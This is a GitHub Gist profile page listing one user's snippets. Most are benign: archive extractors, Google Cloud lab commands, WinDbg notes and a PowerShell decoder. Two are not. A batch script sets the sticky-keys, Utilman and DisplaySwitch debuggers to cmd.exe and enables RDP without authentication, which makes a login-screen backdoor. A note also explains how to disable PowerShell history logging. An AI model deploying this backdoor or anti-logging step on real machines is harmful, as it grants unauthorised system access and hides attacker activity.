Skip to content

Instantly share code, notes, and snippets.

Avatar
😹

Tuan T tuantmb

😹
  • Vietnam
View GitHub Profile
@tuantmb
tuantmb / extract.bat
Created Jun 12, 2021 — forked from fuzzmz/extract.bat
Recursively extract archives in nested folders with 7-zip
View extract.bat
FOR /D /r %%F in ("*") DO (
pushd %CD%
cd %%F
FOR %%X in (*.rar *.zip) DO (
"C:\Program Files\7-zip\7z.exe" x %%X
)
popd
)
@tuantmb
tuantmb / extract_nested_zip.sh
Created Jun 12, 2021
CTF extract nested zip (zip in zip)
View extract_nested_zip.sh
#!/bin/bash
function extract(){
#unzip $1 -d ${1/.zip/} && eval $2 && cd ${1/.zip/}
unzip $1 && eval $2
for zip in $(find . -maxdepth 1 -name "*.zip"); do
extract $zip 'rm $1'
done
}
@tuantmb
tuantmb / info.txt
Created May 31, 2021 — forked from hook-s3c/info.txt
Disable Powershell logging
View info.txt
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
this directory also hosts per-application logs
--------------------------------------------------------------
Disable Logging...
remove-module psreadline
@tuantmb
tuantmb / Serverless Cloud Run Development.txt
Created Apr 3, 2021
My scripts for "Serverless Cloud Run Development: Challenge Lab" of Qwiklab
View Serverless Cloud Run Development.txt
gcloud auth list
gcloud config list project
gcloud config set project \
$(gcloud projects list --format='value(PROJECT_ID)' \
--filter='qwiklabs-gcp')
gcloud config set run/region us-central1
gcloud config set run/platform managed
git clone https://github.com/rosera/pet-theory.git && cd pet-theory/lab07
export PROJECT_ID=$(gcloud info --format='value(config.project)')
View Create and Manage Cloud Resources.md

Task 1: Create a project jumphost instance

#Navigation menu > Compute engine > VM Instance
gcloud config set compute/zone us-east1-b
gcloud config set compute/region us-east1

gcloud compute instances create nucleus-jumphost \
	--machine-type f1-micro
@tuantmb
tuantmb / DebugWithWindbg.md
Created Mar 10, 2021 — forked from reinaldocoelho/DebugWithWindbg.md
Debug on Windows using WinDbg
View DebugWithWindbg.md

Links:

Get WinDbg

  • goto WDK and WinDbg downloads
  • scroll down to Standalone Debugging Tools for Windows (WinDbg)
  • Get the standalone debugging tools (WinDbg) as part of Windows 8.1 SDK
  • execute sdksetup.exe
  • just select Debugging Tools for Windows
@tuantmb
tuantmb / auto-next.js
Created Mar 5, 2021 — forked from Esirei/auto-next.js
Pluralsight AutoNext Module
View auto-next.js
let autoNext = () => {
const modal = document.getElementsByClassName('player-modal is-active');
if (modal.length > 0) {
// const buttons = document.querySelectorAll('[data-css-176v989]');
const buttons = document.getElementsByClassName('u-full-width');
console.log('checking...', buttons.length);
for (let i = 0; i < buttons.length; i++) {
const button = buttons[i];
console.log(button.textContent);
@tuantmb
tuantmb / decompress.ps1
Created Feb 23, 2021 — forked from vortexau/decompress.ps1
Powershell to decompress DEFLATE data
View decompress.ps1
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@tuantmb
tuantmb / sticky_keys_persitence.bat
Created Dec 31, 2020 — forked from ahhh/sticky_keys_persitence.bat
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
View sticky_keys_persitence.bat
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
View Best of Linux Privilege Escalation.md